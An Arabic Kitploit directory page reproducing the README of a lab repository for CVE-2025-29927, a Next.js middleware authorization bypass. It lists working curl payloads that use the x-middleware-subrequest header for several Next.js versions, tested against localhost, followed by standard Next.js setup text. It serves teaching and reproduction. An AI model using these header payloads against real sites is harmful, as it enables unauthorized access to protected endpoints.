Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
vulnerable-nextjs-14-CVE-2025-29927 — بيئة استنساخ لـ CVE-2025-29927، توضّح تجاوز صلاحية الوسيطة (middleware) في Next.js عبر الرأس (header) `x-middleware-subrequest`. يتضمن خطوات استغلال باستخدام curl لإصدارات متعددة من Next.js. | Kitploit
أدوات/GitHubGitHub/lirantal/vulnerable-nextjs-14-cve-2025-29927
المصادقة والترخيصتحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHublirantal/vulnerable-nextjs-14-cve-2025-29927

vulnerable-nextjs-14-CVE-2025-29927

بيئة استنساخ لـ CVE-2025-29927، توضّح تجاوز صلاحية الوسيطة (middleware) في Next.js عبر الرأس (header) `x-middleware-subrequest`. يتضمن خطوات استغلال باستخدام curl لإصدارات متعددة من Next.js.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1483منذ 2 أشهرلم تتم المراجعة بعد

إعادة إنتاج تجاوز التفويض CVE-2025-29927

هذا المستودع عبارة عن إعادة إنتاج للثغرة CVE-2025-29927 في حزمة next

كيفية إعادة الإنتاج

  1. اتبع الخطوات أدناه لاستنساخ التطبيق وتشغيله باستخدام Next.js
  2. اختبر أن التفويض يمنع الوصول إلى نقطة النهاية /api/hello
root@kitploit:~
$ curl http://localhost:3000/api/hello

{"error":"Unauthorized"}%
  1. اختبر أن التفويض يعمل عند تقديم الرمز
root@kitploit:~
$ curl -H "Authorization: my-jwt-token-here" http://localhost:3000/api/hello

{"message":"Hello World"}%
  1. الآن يمكن أيضًا تجاوزه إذا قمنا بتداخل middleware 5 مرات في الرأس الخاص x-middleware-subrequest:
root@kitploit:~
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/api/hello

{"message":"Hello, World"}

استغلال CVE-2025-29927 للإصدارات الأقدم من Next.js

كانت الإصدارات 12 و13 من Next.js تستخدم اصطلاح تسمية مختلفًا لملف الوسيط (_middleware.js)، والذي تم تغييره إلى middleware.js في Next.js 14. يمكن استغلال هذه الثغرة في الإصدارات الأقدم باستخدام ملف _middleware.js.

على سبيل المثال، ستنطبق الحمولات التالية، اعتمادًا على إصدار Next.js واصطلاح التوجيه الخاص بك:

  • curl -H "x-middleware-subrequest: middleware" http://localhost:3000/api/hello (لإصدارات Next.js 12.2 مع ملف middleware.js في جذر التطبيق، وليس داخل دليل pages)
    • curl -H "x-middleware-subrequest: src/middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: _middleware" http://localhost:3000/api/hello (لإصدارات Next.js 11 وحتى 12.2)
  • curl -H "x-middleware-subrequest: pages/_middleware" http://localhost:3000/api/hello
  • curl -H "x-middleware-subrequest: pages/admin/_middleware" http://localhost:3000/api/hello

البدء

أولاً، قم بتشغيل خادم التطوير:

root@kitploit:~
npm run dev
# or
yarn dev
# or
pnpm dev
# or
bun dev

افتح http://localhost:3000 في متصفحك لرؤية النتيجة.

يمكنك البدء في تحرير الصفحة عن طريق تعديل app/page.js. يتم تحديث الصفحة تلقائيًا عند تحرير الملف.

يستخدم هذا المشروع next/font لتحسين وتحميل Geist، عائلة خطوط جديدة لـ Vercel، تلقائيًا.

تعلم المزيد

لمعرفة المزيد حول Next.js، ألق نظرة على الموارد التالية:

  • وثائق Next.js - تعرف على ميزات Next.js وواجهة برمجة التطبيقات.
  • تعلم Next.js - برنامج تعليمي تفاعلي لـ Next.js.

يمكنك الاطلاع على مستودع Next.js على GitHub - ملاحظاتك ومساهماتك مرحب بها!

النشر على Vercel

أسهل طريقة لنشر تطبيق Next.js الخاص بك هي استخدام منصة Vercel من مبتكري Next.js.

تحقق من وثائق نشر Next.js لمزيد من التفاصيل.

المساهمة

يرجى الرجوع إلى CONTRIBUTING للحصول على إرشادات حول المساهمة في هذا المشروع.

تنزيل الأداة